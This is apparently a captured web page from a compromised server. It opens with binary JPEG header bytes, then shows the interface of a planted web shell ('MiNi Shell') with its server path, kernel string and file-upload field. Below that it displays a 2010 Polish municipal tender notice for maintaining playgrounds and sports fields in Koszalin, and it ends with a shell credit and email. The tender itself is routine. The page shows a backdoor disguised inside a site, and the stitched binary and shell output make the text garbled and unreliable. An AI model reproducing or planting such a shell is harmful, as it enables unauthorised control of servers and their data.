JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100315/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100315/56467-N-2010.html

<p class="kh_header"><b>Koszalin: Utrzymanie placów zabaw zarządzanych przez ZDM Koszalin</b><br>
<b>Numer ogłoszenia: 56467 - 2010; data zamieszczenia: 15.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Miejskich w Koszalinie , ul. Połczyńska 24, 75-815 Koszalin, woj. zachodniopomorskie, tel. 094 3118060, faks 094 3425419.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zdm.koszalin.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie placów zabaw zarządzanych przez ZDM Koszalin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest :
Utrzymanie placów zabaw zarządzanych przez ZDM Koszalin. 

Wykaz obiektów stanowiących przedmiot zamówienia :
PLACE  ZABAW
1.	Ul. Spółdzielcza
2.	Ul. Piłsudskiego Jacek i Agatka
3.	Ul. Westerplatte
4.	Ul. Jaśminowa
5.	Ul. Bałtycka
6.	Ul. Wańkowicza w kompleksie ABC
7.	Ul. Doroszewskiego
8.	Ul. Irysów
9.	Ul. Zubrzyckiego
10.	Ul. Batalionów Chłopskich w Parku Dendrologicznym
11.	Ul. Szpitalna w Parku Książąt Pomorskich B
12.	Ul. E. Plater
13.	Ul. Wenedów
14.	Ul. Poprzeczna Trzy Misie
15.	Ul. Budowniczych - trzy częściowy

PLACE  ZABAW  ŁĄCZNIE  Z  BOISKAMI
1.	Ul. Robotnicza ( mini boisko o podłożu piaszczystym )
2.	Ul. Rodła-Grochowskiego ( boiska trawiaste + mini koszykówka z polbruku )
3.	Ul. Wańkowicza WULKAN ( mini boisko do koszykówki trawiaste)
4.	Ul. Jagoszewskiego ( boisko do koszykówki asfaltowe )
5.	Ul. E. Gierczyk ( boisko do koszykówki asfaltowe )
6.	Ul. Cedrowa Misiowa Dolina ( boiska : koszykówka - sztuczna trawa , siatkówka - trawiaste )

BOISKA  SPORTOWE
1.	Ul. Podgórna ( trawiaste )
2.	Ul. Wańkowicza - Tuwima stadion ABC ( asfaltowy z trybunami )
       oraz boisko do koszykówki utwardzone 
3.	Ul. Jaśminowa - Park Rokosowo ( trawiaste )
4.	Ul. Lechicka ( asfaltowe )
5.	Góra Chełmska - Stadion + korty ( trawiaste )
6.	Ul. Sikorskiego ( asfaltowe )
7.	Ul. Sucharskiego ( asfaltowe z trybunami )
8.	Ul.. H. Sawickiej - duże trawiaste
9.	Ul. H. Sawickiej - małe trawiaste 
10.	Ul. Spasowskiego ( trawiaste z trybunami )
11.	Ul. Na Skarpie  ( trawiaste )
12.	Jamno - Ul. Orlików ( trawiaste )
13.	Łabusz - Ul. Róży Wiatrów  ( trawiaste )
Zamówienie obejmuje wykonanie poniższych czynności na placach zabaw i boiskach o łącznej powierzchni 112.518,0 m2 

W okresie letnim od 01.04.2010 r. do 31.10.2010 r. :

a.	ręczne zbieranie z powierzchni placów zabaw i boisk sportowych , w tym terenów zielonych, ciągów pieszych na terenach placów zabaw i boisk powierzonych do utrzymania, zabrudzeń i nieczystości w postaci niedopałków, szkła, papierów, opakowań z tworzyw sztucznych i innych śmieci oraz przeszkód zagrażających bezpieczeństwu  wraz z załadunkiem i wywozem nieczystości, a także ich składowaniem na wysypisku , tj., usuwanie zabrudzeń powstałych z bieżącego ich użytkowania, w taki sposób, by uzyskać wizualny efekt czystego terenu , ale nie rzadziej niż jeden  raz dziennie poza niedzielami  na placach zabaw i raz w tygodniu na boiskach, w miesiącach od kwietnia do października 
b.	wyrównywanie nawierzchni piaszczystych , żwirowych poprzez między innymi zagrabienie
c.	systematyczne lub interwencyjne usuwanie chwastów, traw, liści, gałęzi  z części terenów powierzonych do utrzymania, w częstotliwości uniemożliwiającej zarastanie powierzchni stref bezpieczeństwa ,ciągów pieszych- ścieżek , ale nie rzadziej niż jeden raz w miesiącu
d.	koszenie traw, grabienie i ich wywóz na składowisko wykonawcy z terenów zielonych znajdujących się w obrębie placów zabaw i boisk powierzonych do utrzymania, w częstotliwości wynikającej z bieżących potrzeb, ale nie rzadziej niż jeden raz w miesiącu w sezonie
e.	cięcia pielęgnacyjne żywopłotów , skupin krzewów , z wywozem urobku na wysypisko wykonawcy
f.	pielenie skupin krzewów , żywopłotów , wygrabianie liści z wywozem urobku na wysypisko wykonawcyzabiegi pielęgnacyjne drzew w miarę koniecznych potrzeb 
g.	wywóz nieczystości z koszy na śmieci na składowisko wykonawcy w sezonie minimum dwa razy w tygodniu , 
h.	   konserwacja koszy na śmieci i ławek - drobne naprawy, malowanie , uzupełnienie brakujących elementów drewnianych i metalowych 
i.	zorganizowanie we własnym zakresie i na własny koszt zaplecza produkcyjnego,
      socjalnego , niezbędnego do wykonania umownego zakresu prac 
j.	przeprowadzenie raz w tygodniu przeglądu urządzeń zabawowych i sportowych polegających między innymi na : sprawdzeniu połączeń śrubowych ( w razie luzów dokręcić); sprawdzeniu stanu powierzchni drewnianych ( w razie uszkodzenia usunąć zadry ),
k.	zdemontowanie uszkodzonych części urządzeń zabawowych stanowiących zagrożenie dla bezpieczeństwa dzieci ( złamane, nadłamane lub ostre wystające części itp.)
l.	zabezpieczenie urządzeń przed użytkownikami do chwili usunięcia uszkodzeń 
m.	sporządzanie codziennych raportów z przeglądów placów zabaw i boisk
n.	natychmiastowe informowanie ZDM o występujących nieprawidłowościach , dewastacjach, zniszczeniach itp. przypadkach.

W okresie zimowym od 01.11.2010 do 31.03.2011 r. :

I.	ręczne zbieranie z powierzchni placów zabaw , w tym terenów zielonych, ciągów pieszych na terenach placów zabaw powierzonych do utrzymania, zabrudzeń i nieczystości w postaci niedopałków, szkła, papierów, opakowań z tworzyw sztucznych i innych śmieci oraz przeszkód zagrażających bezpieczeństwu  wraz z załadunkiem i wywozem nieczystości, a także ich składowaniem na wysypisku , tj., usuwanie zabrudzeń powstałych z bieżącego ich użytkowania, w taki sposób, by uzyskać wizualny efekt czystego terenu , ale nie rzadziej niż raz w miesiącu od  listopada do marca włącznie;   
II.	wywóz nieczystości z koszy na śmieci na składowisko wykonawcy  minimum dwa razy w miesiącu; 
III.	podczas występowania opadów śniegu bądź gołoledzi - usuwanie skutków zimy, polegające na zwalczaniu śliskości i opadów śniegu na dwóch ciągach pieszych- ścieżkach na terenach placów zabaw powierzonych w utrzymanie, z częstotliwością zapewniającą bezpieczeństwo, polegające  na :
posypywaniu ciągów pieszych - ścieżek piaskiem lub innymi środkami uszorstaniającymi ,
odgarnianiu śniegu ręcznie i wywozie jego nadmiaru (ilości powodujące znaczne utrudnienia w ruchu pieszych) na miejsce składowania,
IV.     zorganizowanie we własnym zakresie i na własny koszt zaplecza produkcyjnego,      socjalnego oraz miejsca składowania śniegu, niezbędnego do wykonania umownego zakresu prac 

    
Wykonawca zapewnia we własnym zakresie wszelkie materiały i sprzęt niezbędny do wykonania zamówienia .
Wykonawca jest zobowiązany do dokonania wizji terenowej przed złożeniem oferty.

Realizacja zamówienia podlega prawu polskiemu, w tym w szczególności ustawie z dnia 
23 kwietnia 1964 r. Kodeks cywilny (Dz. U. Nr 16 poz. 93 ze zmianami),  ustawie z dnia 
29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2007 r., Nr 223, poz. 1655 ze zmianami).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zakres usług obejmuje utrzymanie placów zabaw zarządzanych przez ZDM Koszalin
1) W okresie letnim od 01.04.2010 r. do 31.10.2010 r. :

a.	ręczne zbieranie z powierzchni placów zabaw i boisk sportowych , w tym terenów zielonych, ciągów pieszych na terenach placów zabaw i boisk powierzonych do utrzymania, zabrudzeń i nieczystości w postaci niedopałków, szkła, papierów, opakowań z tworzyw sztucznych i innych śmieci oraz przeszkód zagrażających bezpieczeństwu  wraz z załadunkiem i wywozem nieczystości, a także ich składowaniem na wysypisku , tj., usuwanie zabrudzeń powstałych z bieżącego ich użytkowania, w taki sposób, by uzyskać wizualny efekt czystego terenu , ale nie rzadziej niż jeden  raz dziennie poza niedzielami  na placach zabaw i raz w tygodniu na boiskach, w miesiącach od kwietnia do października 
b.	wyrównywanie nawierzchni piaszczystych , żwirowych poprzez między innymi zagrabienie
c.	systematyczne lub interwencyjne usuwanie chwastów, traw, liści, gałęzi  z części terenów powierzonych do utrzymania, w częstotliwości uniemożliwiającej zarastanie powierzchni stref bezpieczeństwa ,ciągów pieszych- ścieżek , ale nie rzadziej niż jeden raz w miesiącu
d.	koszenie traw, grabienie i ich wywóz na składowisko wykonawcy z terenów zielonych znajdujących się w obrębie placów zabaw i boisk powierzonych do utrzymania, w częstotliwości wynikającej z bieżących potrzeb, ale nie rzadziej niż jeden raz w miesiącu w sezonie
e.	cięcia pielęgnacyjne żywopłotów , skupin krzewów , z wywozem urobku na wysypisko wykonawcy
f.	pielenie skupin krzewów , żywopłotów , wygrabianie liści z wywozem urobku na wysypisko wykonawcyzabiegi pielęgnacyjne drzew w miarę koniecznych potrzeb 
g.	wywóz nieczystości z koszy na śmieci na składowisko wykonawcy w sezonie minimum dwa razy w tygodniu , 
h.	   konserwacja koszy na śmieci i ławek - drobne naprawy, malowanie , uzupełnienie brakujących elementów drewnianych i metalowych 
i.	zorganizowanie we własnym zakresie i na własny koszt zaplecza produkcyjnego,
      socjalnego , niezbędnego do wykonania umownego zakresu prac 
j.	przeprowadzenie raz w tygodniu przeglądu urządzeń zabawowych i sportowych polegających między innymi na : sprawdzeniu połączeń śrubowych ( w razie luzów dokręcić); sprawdzeniu stanu powierzchni drewnianych ( w razie uszkodzenia usunąć zadry ),
k.	zdemontowanie uszkodzonych części urządzeń zabawowych stanowiących zagrożenie dla bezpieczeństwa dzieci ( złamane, nadłamane lub ostre wystające części itp.)
l.	zabezpieczenie urządzeń przed użytkownikami do chwili usunięcia uszkodzeń 
m.	sporządzanie codziennych raportów z przeglądów placów zabaw i boisk
n.	natychmiastowe informowanie ZDM o występujących nieprawidłowościach , dewastacjach, zniszczeniach itp. przypadkach.

2). W okresie zimowym od 01.11.2010 do 31.03.2011 r. :

I.	ręczne zbieranie z powierzchni placów zabaw , w tym terenów zielonych, ciągów pieszych na terenach placów zabaw powierzonych do utrzymania, zabrudzeń i nieczystości w postaci niedopałków, szkła, papierów, opakowań z tworzyw sztucznych i innych śmieci oraz przeszkód zagrażających bezpieczeństwu  wraz z załadunkiem i wywozem nieczystości, a także ich składowaniem na wysypisku , tj., usuwanie zabrudzeń powstałych z bieżącego ich użytkowania, w taki sposób, by uzyskać wizualny efekt czystego terenu , ale nie rzadziej niż raz w miesiącu od  listopada do marca włącznie;   
II.	wywóz nieczystości z koszy na śmieci na składowisko wykonawcy  minimum dwa razy w miesiącu; 
III.	podczas występowania opadów śniegu bądź gołoledzi - usuwanie skutków zimy, polegające na zwalczaniu śliskości i opadów śniegu na dwóch ciągach pieszych- ścieżkach na terenach placów zabaw powierzonych w utrzymanie, z częstotliwością zapewniającą bezpieczeństwo, polegające  na :
posypywaniu ciągów pieszych - ścieżek piaskiem lub innymi środkami uszorstaniającymi ,
odgarnianiu śniegu ręcznie i wywozie jego nadmiaru (ilości powodujące znaczne utrudnienia w ruchu pieszych) na miejsce składowania,
IV.     zorganizowanie we własnym zakresie i na własny koszt zaplecza produkcyjnego,      socjalnego oraz miejsca składowania śniegu, niezbędnego do wykonania umownego zakresu prac 
ZAMAWIAJĄCY   MOŻE   UDZIELIĆ   ZAMÓWIEŃ  UZUPEŁNIAJĄCYCH do 50% wartości zamówienia podstawowego w trybie zamówień z wolnej ręki na zasadach określonych w art. 67 ust. 1 pkt 6  PZP</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 77.31.41.00-5, 90.62.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy zgodnie z art. 22 ust. 1 PZP spełniają warunki dotyczące: 
-	posiadania  uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
-	posiadania wiedzy i doświadczenia
-	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
-	sytuacji ekonomicznej i finansowej
oraz nie podlegają wykluczeniu na podstawie art. 24 ust. 1 PZP.
Wykonawca musi posiadać zezwolenie na prowadzenie działalności w zakresie:
zbierania i transportu odpadów komunalnych na podstawie Ustawy z dnia 13 września 1996 roku o utrzymaniu porządku i czystości w gminach  (Dz.U. Nr 132 poz. 662 z póź. zm.),
ustawy z dnia 27 kwietnia 2001r. O odpadach (Dz.U. Nr 62 poz. 628 z póź. zm.),
Uchwały Rady Miejskiej w Koszalinie Nr XXXIII/522/2006 z dnia 16 lutego 2006r. z póź. zm. ,
Rozporządzenia Ministra Środowiska z dnia 21.04.2006r. w sprawie listy odpadów, które posiadacz odpadów może przekazywać osobom fizycznym lub jednostkom organizacyjnym nie będącym przedsiębiorcami oraz dopuszczalnych metod odzysku (Dz.U. Nr 75 poz. 527),
oraz wykazać gotowość odbioru odpadów komunalnych przez przedsiębiorcę   prowadzącego działalność w zakresie odzysku lub utylizacji odpadów komunalnych zgodnie z obowiązującymi przepisami dotyczącymi utrzymania porządku i czystości.

Zamawiający dokona oceny na podstawie dokumentów żądanych w tym ogłoszeniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi przedstawić wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również  wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie.
Wykonawca musi wykazać zadania związane z usługą utrzymania zieleni i czystości na terenach zielonych , których wartość wynosi minimum 100.000,00 zł.(netto)
Zamawiający dokona oceny na podstawie dokumentów żądanych w tym ogłoszeniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać sprzęt niezbędny do realizacji zamówienia, lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału w tym minimalne wymagania: kosy spalinowe szt.5, kosiarka spalinowa szt.1, kosiarka ciągnikowa szt.1,nożyce do cięcia krzewów i żywopłotów szt.2,samochód lub ciągnik do transportu odpadów i piasku szt.1.
Zamawiający dokona oceny na podstawie dokumentów żądanych w tym ogłoszeniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz     nr  1 
Formularz     nr 2  
Formularz     nr 6</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wzór umowy w sprawie  zamówienia   publicznego, jaką  zamawiający podpisze 
 z   wybranym wykonawcą, zawarty jest w Rozdziale III SIWZ. Umowa może zostać zawarta w terminie nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty. Umowa może ulec zmianie jeżeli w wyniku zmiany stanu  faktycznego lub prawnego powstanie konieczność zmiany zakresu świadczonego zamówienia lub zmiany sposobu realizacji zamówienia. Wszystkie zmiany umowy dokonywane są w formie pisemnej i muszą być dokonane przez upoważnionych przedstawicieli obu stron. Warunki zmian dotyczą w szczególności:
zmiany terminu realizacji zamówienia w przypadkach:
-	wystąpienia zamówień dodatkowych, koniecznych do wykonania i niemożliwych wcześniej do przewidzenia;
-	wystąpienia zdarzeń losowych,  wyjątkowych niekorzystnych warunków atmosferycznych uniemożliwiającymi realizację zamówienia;
Zmiana terminu realizacji nastąpi z uwzględnieniem czasu niezbędnego do usunięcia  przyczyny jej wprowadzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> zdm.koszalin.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Miejskich 
ul. Połczyńska 24
75-815 Koszalin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2010 godzina 10:00, miejsce: Zarząd Dróg Miejskich 
ul. Połczyńska 24
75-815 Koszalin ( SEKRETARIAT).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com